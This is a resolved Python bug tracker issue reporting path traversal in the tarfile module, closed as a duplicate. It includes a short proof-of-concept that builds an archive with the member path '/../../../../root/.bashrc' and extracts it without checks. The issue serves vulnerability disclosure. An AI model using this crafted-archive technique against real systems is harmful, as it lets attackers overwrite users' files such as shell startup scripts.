classification
Title: tarfile missing cross-directory checking
Type: security Stage: resolved
Components: Library (Lib) Versions: Python 3.8
process
Status: closed Resolution: duplicate
Dependencies: Superseder: tarfile: Traversal attack vulnerability
View: 21109
Assigned To: Nosy List: eric.smith, martin.panter, xiongpanju
Priority: normal Keywords:

Created on 2021-09-11 07:45 by xiongpanju, last changed 2021-09-20 06:34 by martin.panter. This issue is now closed.

Messages (3)
msg401631 - (view) Author: daji ma (xiongpanju) Date: 2021-09-11 07:45
tarfile missing cross-directory checking, like ../ or ..\, this  potentially cause cross-directory decompression.
the exp:
# -*- coding: utf-8 -*-
import tarfile



def extract_tar(file_path, dest_path):
    try:
        with tarfile.open(file_path, 'r') as src_file:
            for info in src_file.getmembers():
                src_file.extract(info.name, dest_path)
        return True
    except (IOError, OSError, tarfile.TarError):
        return False


def make_tar():
    tar_file=tarfile.open('x.tar.gz','w:gz')
    tar_file.add('bashrc', '/../../../../root/.bashrc')
    tar_file.list(verbose=True)
    tar_file.close()


if __name__ == '__main__':
    make_tar()
    extract_tar('x.tar.gz', 'xx')
msg401643 - (view) Author: Eric V. Smith (eric.smith) * (Python committer) Date: 2021-09-11 17:05
This is documented in the tarfile docs:

Warning

Never extract archives from untrusted sources without prior inspection. It is possible that files are created outside of path, e.g. members that have absolute filenames starting with "/" or filenames with two dots "..".
msg402194 - (view) Author: Martin Panter (martin.panter) * (Python committer) Date: 2021-09-20 06:34
Issue 21109 has been open for a while and is the same as this, if I am not mistaken.
History
Date User Action Args
2021-09-20 06:34:12martin.pantersetstatus: open -> closed

superseder: tarfile: Traversal attack vulnerability

nosy: + martin.panter
messages: + msg402194
resolution: duplicate
stage: resolved
2021-09-11 17:05:24eric.smithsetnosy: + eric.smith
messages: + msg401643
2021-09-11 07:45:41xiongpanjucreate